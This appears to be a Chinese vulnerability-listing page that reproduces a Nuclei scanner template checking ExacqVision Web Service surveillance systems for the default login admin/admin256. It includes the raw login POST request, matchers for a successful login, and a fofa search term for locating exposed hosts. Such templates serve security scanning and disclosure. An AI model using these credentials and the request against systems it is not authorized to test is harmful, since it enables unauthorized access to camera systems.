exacqvision-default-login: ExacqVision Default Login

日期: 2025-08-01 | 影响软件: ExacqVision | POC: 已公开

漏洞描述

ExacqVision Web Service default login credentials (admin/admin256) were discovered. fofa: ExacqVision

PoC代码[已公开]

id: exacqvision-default-login

info:
  name: ExacqVision Default Login
  author: ELSFA7110
  severity: high
  description: ExacqVision Web Service default login credentials (admin/admin256) were discovered.
  reference:
    - https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf
  classification:
    cwe-id: cwe-798
  metadata:
    max-request: 1
  tags: exacqvision,default-login,vuln

http:
  - raw:
      - |
        POST /service.web HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Connection: close

        action=login&u={{username}}&p={{password}}

    payloads:
      username:
        - admin
      password:
        - admin256
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "application/json"

      - type: word
        part: body
        condition: and
        words:
          - '"auth":'
          - '"success": true'
# digest: 4b0a00483046022100cb67fee8b181c34c891ead9adf619f76f219a76c4fc46fa044c380dcd42ef428022100835ade21632696c39f2ccae557559e4bce926c14a6f243bd4db96f1a34b0661c:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/exacqvision/exacqvision-default-login.yaml

相关漏洞推荐